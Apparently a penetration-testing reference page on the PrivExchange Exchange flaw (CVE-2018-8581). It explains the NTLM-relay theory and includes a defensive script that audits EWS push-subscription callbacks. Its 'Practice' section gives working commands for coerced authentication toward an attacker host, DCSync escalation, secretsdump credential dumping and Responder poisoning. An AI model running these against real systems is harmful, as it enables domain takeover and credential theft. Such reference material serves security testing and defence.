PrivExchange
CVE-2018-8581
Theory
PrivExchange relies on coerced authentication through PushSubscription, an Exchange Web Services (EWS) API that lets a client subscribe to push notifications. Attackers abuse it to make the Exchange server authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful for NTLM relay because the session signing and MIC mitigations that hinder relaying do not apply to HTTP.
As Exchange servers usually have high privileges in the domain (e.g. WriteDacl on the domain object, see Abusing ACLs), the coerced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations).
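As a defensive counterpart to the mechanism above, here is an added Python example (not from the original page nor from the PrivExchange project) that parses captured EWS Subscribe bodies, such as a reverse proxy in front of /EWS/Exchange.asmx could record, and flags any PushSubscriptionRequest callback that uses plain HTTP or points at a host outside an allow-list. ALLOWED_HOSTS, the sample bodies and the hostnames in them are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# EWS SOAP namespaces used by the Subscribe operation.
NS = {"m": "http://schemas.microsoft.com/exchange/services/2006/messages",
      "t": "http://schemas.microsoft.com/exchange/services/2006/types"}
# Assumption: the only host that should ever receive push notifications.
ALLOWED_HOSTS = {"notifications.corp.example"}

def push_callbacks(soap_body):
    """Return every PushSubscriptionRequest callback URL in one EWS body."""
    root = ET.fromstring(soap_body)
    return [u.text.strip() for u in root.iterfind(".//m:PushSubscriptionRequest/t:URL", NS) if u.text]

def classify_callback(url):
    """'ok', 'plaintext' or 'unknown-host' for one callback URL."""
    parsed = urlparse(url)
    if (parsed.hostname or "").lower() not in ALLOWED_HOSTS:
        return "unknown-host"  # Exchange would authenticate to a host we do not own
    if parsed.scheme != "https":
        return "plaintext"  # NTLM over plain HTTP is the relayable case
    return "ok"

def audit(bodies):
    """(url, verdict) for every callback found in the captured bodies."""
    return [(u, classify_callback(u)) for b in bodies for u in push_callbacks(b)]

# Constructed Subscribe bodies, as a proxy in front of /EWS/Exchange.asmx might capture them.
_TEMPLATE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
    xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
  <soap:Body><m:Subscribe><m:PushSubscriptionRequest>
    <t:FolderIds><t:DistinguishedFolderId Id="inbox"/></t:FolderIds>
    <t:EventTypes><t:EventType>NewMailEvent</t:EventType></t:EventTypes>
    <t:StatusFrequency>1</t:StatusFrequency>
    <t:URL>{url}</t:URL>
  </m:PushSubscriptionRequest></m:Subscribe></soap:Body>
</soap:Envelope>"""

SAMPLE_BODIES = [
    _TEMPLATE.format(url="https://notifications.corp.example/ews/push"),  # legitimate
    _TEMPLATE.format(url="http://10.0.0.5/push/"),  # callback to a host outside the allow-list
]

if __name__ == "__main__":
    for url, verdict in audit(SAMPLE_BODIES):
        print(f"{verdict:13s} {url}")
```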

Practice
On February 12th 2019, Microsoft released updates for Exchange which resolved:
- the coerced authentication issue
- the fact that Exchange servers had excessive permissions, allowing an attacker to compromise the whole domain.
First, start the NTLM relay that will escalate privileges.
# NTLM relaying is used to relay the connection and grant DCSync privileges
ntlmrelayx.py -t ldap://$DC --escalate-user $USER_TO_ESCALATE
Using PrivExchange, we can log in to Exchange Web Services and call the API. The user must have a mailbox for the coerced authentication to work.
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
We can now dump domain credentials through DCSync.
secretsdump.py $DOMAIN/$USER_TO_ESCALATE@$DC -just-dc
If you don't have any credentials, it is still possible to relay an authentication to make the API call. The httpattack.py script can be used with ntlmrelayx.py to perform this attack. It relies on NTLM relaying of credentials captured through LLMNR / NBT-NS poisoning on the network.
Using the modified httpattack.py, we can use ntlmrelayx to perform this attack.
#Backup the old httpattack.py
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/
mv httpattack.py httpattack.py.old
#Replace it
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
#Edit the attacker_url parameter (the host to which Exchange will authenticate)
sed -i 's/attacker_url = .*$/attacker_url = "$ATTACKER_URL"/' httpattack.py
#Build the env
cd /PATH/TO/impacket
virtualenv venv && source venv/bin/activate
pip install .
#Start relay
ntlmrelayx.py -t https://exchange.server/EWS/Exchange.asmx
We can now use LLMNR/NBT-NS/mDNS poisoning with Responder to capture credentials and relay them:
responder -i eth0
Exchange2domain is an all-in-one tool for the PrivExchange exploit. You only need to open the web server port, so no high privileges are required.
python2.7 Exchange2domain.py -ah attackerip -ap listenport -u user -p password -d domain.com -th DCip MailServerip